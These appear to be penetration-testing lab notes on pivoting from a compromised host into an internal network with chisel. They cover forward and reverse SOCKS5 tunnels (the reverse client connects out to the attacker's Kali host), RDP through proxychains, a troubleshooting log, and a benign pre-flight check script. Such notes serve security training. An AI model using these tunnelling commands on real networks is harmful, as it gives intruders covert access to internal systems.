# Introduction

- `Chisel` is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data secured with SSH
- With `chisel` we can create a client-server tunnel in a FW-restricted environment
- Assuming we have compromised a dual-homed pivot host, we can start a `chisel` server on the pivot host that will listen on a specific port and forward our traffic to the internal network through the established tunnel

![[images/Pasted image 20251023105308.png]]

# Sequence for `chisel` forward pivot

- Clone the `chisel` repo and build the binary

```bash
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
```

- Move the `chisel` binary to the pivot host

```bash
scp chisel ubuntu@<external_ip_pivot_host>:~/
```

- Set up the `chisel` server on the pivot host

```bash
./chisel server -v -p 1234 --socks5
```

- Connect to the `chisel` server on the pivot host from the Kali host; the `socks` remote opens a local SOCKS5 listener on 127.0.0.1:1080 by default

```bash
./chisel client -v <external_ip_pivot_host>:1234 socks
```

- Confirm the correct entry in `/etc/proxychains4.conf`

```bash
# last line of /etc/proxychains4.conf should read
socks5 127.0.0.1 1080
```

- Use `chisel` and `proxychains4` to reach into the internal subnet

```bash
proxychains4 xfreerdp3 /v:<internal_ip_target> /u:username /p:'<password>'
```

# Sequence for `chisel` reverse pivot

- Useful when FW rules restrict inbound connections to our pivot host
- Set up the `chisel` server on the Kali host

```bash
sudo ./chisel server --reverse -v -p 1234 --socks5
```

- Connect to the `chisel` server on the Kali host from the pivot host

```bash
./chisel client -v <kali_host_ip>:1234 R:socks   # the R:socks option indicates a reverse remote
```

- Confirm the correct entry in `/etc/proxychains4.conf` on the Kali host

```bash
# last line of /etc/proxychains4.conf should read
socks5 127.0.0.1 1080
```

- Use `chisel` and `proxychains4` to reach into the internal subnet

```bash
proxychains4 xfreerdp3 /v:<internal_ip_target> /u:username /p:'<password>'
```

# Exercise

## Attempt A

- First, clone and build `chisel`

![[images/Pasted image 20251023104407.png]]
![[images/Pasted image 20251023104423.png]]
![[images/Pasted image 20251023104454.png]]

- Second, move the `chisel` binary to the target with `scp`

![[images/Pasted image 20251023104905.png]]
![[images/Pasted image 20251023104913.png]]

- Third, start the `chisel` server on the pivot host

![[images/Pasted image 20251023105500.png]]

- Running into an error due to an outdated version of `glibc`

![[images/Pasted image 20251023105521.png]]

- Try to move `glibc-2.34.tar.gz` to the pivot host and build
- Running into errors

![[images/Pasted image 20251023111101.png]]

## Attempt B

- Let's start over with an older version of `chisel` that works with `glibc-2.31`, which is available on the pivot host

![[images/Pasted image 20251023111202.png]]

```bash
# check GLIBC version
ldd --version
```

- First, download `chisel` version 1.7.6 on the Kali host

![[images/Pasted image 20251023111324.png]]

- Second, decompress `chisel`

![[images/Pasted image 20251023111830.png]]

- Third, move `chisel` to the pivot host

![[images/Pasted image 20251023111841.png]]
![[images/Pasted image 20251023111852.png]]

- Make `chisel` executable

![[images/Pasted image 20251023112033.png]]

- Fourth, start the `chisel` server on the pivot host

![[images/Pasted image 20251023112103.png]]

- Fifth, start the `chisel` client on the Kali host

![[images/Pasted image 20251023112216.png]]

- Sixth, establish an RDP connection to the downstream Windows target
- Leverage `proxychains4`
- Errors

![[images/Pasted image 20251023112647.png]]

## Attempt C

- Try `chisel` with port 1080 instead of 9050

![[images/Pasted image 20251023112902.png]]
![[images/Pasted image 20251023112907.png]]

- We established a tunnel
- Test the connection to the downstream Windows host

![[images/Pasted image 20251023112926.png]]

- Attempt an RDP connection

![[images/Pasted image 20251023113006.png]]

- That worked: it didn't like us using the existing port 9050 in the `/etc/proxychains4.conf` file

![[images/Pasted image 20251023113307.png]]
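The two things that cost time in Attempts A to C were a binary that wanted a newer glibc than the pivot host had, and a `proxychains4.conf` still pointing at port 9050. The script below is an added pre-flight check for both (it is not part of the original note or the chisel project); the `SAMPLE_*` inputs are constructed, and it assumes `objdump`, `ldd` and `awk` are present on the host it runs on.

```bash
# Added pre-flight check for the two failure modes hit in the exercise above: a chisel
# binary needing a newer glibc than the pivot host has, and a proxychains4.conf whose
# last line still points at port 9050 (the tor default) instead of chisel's 1080.

# True when dotted version $1 is >= dotted version $2 (e.g. 2.34 >= 2.31).
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".");
        for (i = 1; i <= (n > m ? n : m); i++) {
            if ((x[i] + 0) > (y[i] + 0)) exit 0;
            if ((x[i] + 0) < (y[i] + 0)) exit 1;
        }
        exit 0 }'
}

# glibc version from the first line of `ldd --version` (its last field).
ldd_version() { printf '%s\n' "$1" | head -n1 | awk '{print $NF}'; }

# Highest GLIBC_x.y symbol version a dynamically linked binary imports, given the
# text of `objdump -T <binary>`; empty for a static build (no GLIBC_ tags at all).
required_glibc() {
    printf '%s\n' "$1" | grep -o 'GLIBC_[0-9][0-9.]*' | sed 's/^GLIBC_//' \
        | sort -t. -k1,1n -k2,2n | tail -n1
}

# True when the last active line of a proxychains4.conf is "socks5 127.0.0.1 1080".
proxychains_ok() {
    last=$(printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' | tail -n1)
    [ "$(printf '%s' "$last" | tr -s '[:space:]' ' ')" = "socks5 127.0.0.1 1080" ]
}

# Constructed sample inputs (not captured from a real host) for offline checks.
SAMPLE_LDD='ldd (Ubuntu GLIBC 2.31-0ubuntu9.16) 2.31'
SAMPLE_OBJDUMP='0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34) __libc_start_main
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) free'
SAMPLE_CONF_BAD='[ProxyList]
socks4 127.0.0.1 9050'
SAMPLE_CONF_OK='[ProxyList]
socks5  127.0.0.1 1080'

# Stand-alone use: on the pivot host `sh preflight.sh ./chisel` checks the copied
# binary against the installed glibc; on the Kali host it checks /etc/proxychains4.conf.
if [ -n "${1:-}" ]; then
    need=$(required_glibc "$(objdump -T "$1" 2>/dev/null)")
    have=$(ldd_version "$(ldd --version 2>/dev/null)")
    if [ -z "$need" ] || version_ge "$have" "$need"; then echo "$1: OK on glibc $have"
    else echo "$1 needs GLIBC_$need but host has $have: use an older release (Attempt B)"; fi
fi
[ -r /etc/proxychains4.conf ] && proxychains_ok "$(cat /etc/proxychains4.conf)" \
    && echo "proxychains4.conf: OK" || echo "proxychains4.conf: missing or last line is not socks5 127.0.0.1 1080"
```

Run it on the pivot host before starting the server and on the Kali host before the first `proxychains4` command; a 1.x build that only imports `GLIBC_2.2.5` symbols passes on the 2.31 host, while the fresh `go build` from Attempt A fails the check with `GLIBC_2.34`.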